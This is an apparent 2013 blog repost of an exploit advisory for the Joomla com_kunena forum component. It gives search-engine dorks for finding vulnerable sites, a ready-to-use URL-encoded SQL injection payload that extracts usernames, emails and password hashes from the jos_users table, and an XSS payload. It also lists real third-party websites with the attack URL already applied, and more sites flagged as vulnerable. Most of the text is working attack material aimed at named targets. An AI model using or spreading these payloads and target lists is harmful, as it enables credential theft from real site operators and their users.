Monday, 1 April 2013

Joomla com_kunena


# Exploit Title: Joomla com_kunena - SQL Injection Vulnerability / Cross-Site Scripting
# Vendor Name: Kunena
# Url Vendor: http://www.kunena.org/
# Category: WebApps
# Type: php
# Risk: Critical
# Dork: intext:"Powered by Kunena" com_kunena func=
# Dork: inurl:index.php?option=com_kunena&
# Dork: intext:"Gracias a Kunena" com_kunena func=
# Info: This Vulnerability Affects About 70 million Web's


# Exmaple/Sql=> http://site/index.php?option=com_kunena&func=userlist&search= [ Sql ]
# Example/Xss=> http://site/index.php?option=com_kunena&func=userlist&search= [ Xss ]

# Exploit/Comand/Sql=> %25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
# Exploit/Comand/Xss=> "><img src=x onerror=;;alert('1337') />


# Exmaple/Time_Real
http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.oui-iohe.org/webcolam/rifge/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;


# Sample/Sql/Xss/Vulnerabirility
http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%'
http://pureos.org/index.php?option=com_kunena&func=userlist&search=%'
http://www.twinmos.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.vagturbo.cl/index.php?option=com_kunena&func=userlist&search=%'
http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%'
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%'
http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%'
http://www.deandroid.com.ar/index.php?option=com_kunena&func=userlist&search=%'

# Many More in Goole & Bing

# 1337day.com [2012-10-28]


0 comments:

Post a Comment